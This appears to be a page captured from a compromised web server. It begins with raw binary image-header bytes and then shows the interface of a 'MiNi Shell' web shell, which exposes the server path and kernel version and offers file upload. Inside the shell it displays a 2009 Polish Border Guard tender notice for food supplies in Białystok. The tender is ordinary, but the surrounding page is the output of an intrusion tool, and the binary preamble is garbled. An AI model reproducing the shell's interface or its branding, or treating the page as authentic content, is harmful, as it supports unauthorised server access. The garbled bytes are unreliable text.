JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/119095-N-2009.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony  na jednorazową dostawę produktów ogólnospożywczych (sprawa nr 40/ZP/WTiZ/09)</b><br>
<b>Numer ogłoszenia: 119095 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Straży Granicznej im. gen. Henryka Minkiewicza , ul. Bema 100, 15-370 Białystok, woj. podlaskie, tel. 085 7145171, faks 085 7484218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaski.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony  na jednorazową dostawę produktów ogólnospożywczych (sprawa nr 40/ZP/WTiZ/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest jednorazowa dostawa produktów ogólnospożywczych zgodnie z opisem przedmiotu zamówienia stanowiącym Załącznik nr 1 do SIWZ.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy
1. Groszek zielony konserwowy, kg 5, Puszka do 0,5kg; 2. Kukurydza konserwowa, kg 3, Puszka do 0,5kg; 3. Ogórek konserwowy, kg 20, Opakowanie szklane o pojemności do 1 l. Zawartości produktu po odsączeniu zalewy  300 - 500 g ; 4. Papryka konserwowa, kg 20, Opakowanie szklane o pojemności do 1 l. Zawartości produktu po odsączeniu zalewy  300 - 500 g; 5. Chrzan konserwowy w occie, kg 3, Opakowanie szklane o zawartości produktu netto  do 200 g ; 6. Dżem wysokosłodzony - różne smaki, kg 40, Opakowanie szklane o poj. 200 - 400  g; 7. Olej roślinny, l 70, Butelka pojemności 1 l; 8. Liść laurowy, kg 1, Opakowanie detaliczne. Torebka do 20 g.; 9. Papryka mielona słodka, kg 1, Opakowanie detaliczne. Torebka do 20 g.; 10. Pieprz naturalny mielony, kg 2, Opakowanie detaliczne. Torebka do 20 g.; 11. Majeranek, kg 1, Opakowanie detaliczne. Torebka do 20 g.; 12. Ziele angielskie, kg 1, Opakowanie detaliczne. Torebka do 20 g.; 13. Sól kuchenna , kg 125, Opakowanie  o pojemności 1 kg; 14. Przyprawa do zup w płynie, l 25, Butelka szklana o pojemności 1 l; 15. Przyprawa do mięsa, kg 2, Opakowanie detaliczne. Torebka do 40 g.; 16. Przyprawa do ryb, kg 1, Opakowanie detaliczne. Torebka do 40 g.; 17. Ocet, l 2, Butelka szklana o pojemności 0,5 l; 18. Przyprawa do drobiu, kg 1, Opakowanie detaliczne. Torebka do 40 g.; 19. Przyprawa uniwersalna do potraw w proszku, kg 5, Opakowanie detaliczne. Torebka do 500 g.; 20. Koncentrat pomidorowy 30%, kg 35, Opakowanie detaliczne do 200 g; 21. Majonez, kg 8, Opakowanie szklane o zawartości produktu netto  500 - 800 g; 22. Musztarda, kg 10, Opakowanie z tworzywa o zawartości produktu netto  do 500g z możliwością wyciskania (tuba); 23. Ketchup, kg 15, Opakowanie z tworzywa o zawartości produktu netto  do 500g z możliwością wyciskania (tuba); 24. Koncentrat rosół drobiowy (baza do zup), kg 10, Wiaderko o pojemności do 3 kg; 25. Kawa zbożowa, kg 5, Opakowanie do 500 g; 26. Ryż, kg 35, Opakowanie do 1 kg (torba papierowa); 27. Mąka pszenna, kg 60, Opakowanie do 1 kg (torba papierowa); 28. Kasza gryczana, kg 30, Opakowanie do 0,5 kg; 29. Kasza manna, kg 5, Opakowanie do 0,5 kg (torba papierowa); 30. Mąka ziemniaczana, kg 1, Opakowanie do 1 kg (torba papierowa); 31. Kasza jęczmienna mazurska, kg 35, Opakowanie do 0,5 kg; 32. Płatki kukurydziane, kg 10, Opakowanie do 0,5 kg; 33. Makaron dwujajeczny świderki, kg 35, Opakowanie do 1 kg; 34. Makaron nitki długie, kg 10, Opakowanie 0,4 kg -1 kg; 35. Kakao naturalne, kg 2, W opakowaniach a` 100 g; 36. Czekolada pełna mleczna,  kg 3, Tabliczka a`100 g; 37. Wafel kakaowy , kg 3, Opakowanie detaliczne a` 20 g; 38. Herbata ekspresowa w torebkach a`  1,5 g, kg 20, Waga torebki z herbatą 1.5 g. Opakowanie detaliczne do 100 szt.; 39. Galaretka owocowa w proszku - różne smaki, kg 20, Opakowania detaliczne. Torebka do 100 g; 40. Syrop owocowy - różne smaki, kg 20 Butelka do 0,5 l; 41. Napój herbaciany rozpuszczalny - różne smaki, kg 20, Torebka do 0,5 kg;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.22.90-3, 15.41.11.00-3, 15.87.00.00-7, 15.87.23.00-4, 15.87.22.00-3, 15.87.12.70-7, 15.87.21.00-2, 15.87.24.00-5, 15.87.11.10-8, 15.33.14.27-6, 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.89.10.00-0, 15.60.00.00-4, 15.61.33.00-1, 15.61.40.00-5, 15.61.33.11-1, 15.85.11.00-9, 15.84.10.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy : 1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia .
Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie 
w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunków.
Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.
2. W przypadku złożenia oferty przez podmioty występujące wspólnie  Zamawiający dopuszcza następujący sposób spełnienia warunków udziału w postępowaniu :  
- w odniesieniu do wymogu dot. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - co najmniej jeden Wykonawca odpowiednio do części wykonywanych prac,- w odniesieniu do wymogu dot. posiadania niezbędnej wiedzy i doświadczenia - łączny potencjał niezbędnej wiedzy i doświadczenia,- w odniesieniu do wymogu dot. dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia - łączny potencjał techniczny Wykonawców, - w odniesieniu do wymogu dot. dysponowania osobami zdolnymi do wykonania zamówienia -  łączny potencjał kadrowy Wykonawców, - w odniesieniu do wymogu dot. sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - łączna sytuacja ekonomiczna i finansowa Wykonawców. 
Każdy z wykonawców ubiegający się wspólnie o udzielenie zamówienia ma obowiązek dołączyć do składanej oferty dokumenty wymagane w rozdz. IV pkt.1 ppkt.1.1 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca przystępując do postępowania  zobowiązany jest dostarczyć :
1.1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2)	oświadczenie o spełnieniu warunków z art. 22 ust.1 pkt.1-4 ustawy prawo zamówień publicznych - zgodne w treści z załączonym do SIWZ wzorem -Załącznik nr 4.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt.1 ppkt.1.1, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentu, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.podlaski.strazgraniczna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podlaski Oddział Straży Granicznej ul. Bema 100, 15- 370  Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2009 godzina 11:00, miejsce: Kancelaria Jawna Wydziału Prezydialnego POSG w Białymstoku przy ul. Bema 100, bud. 2 pok. 100A (kod pocztowy 15-370).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com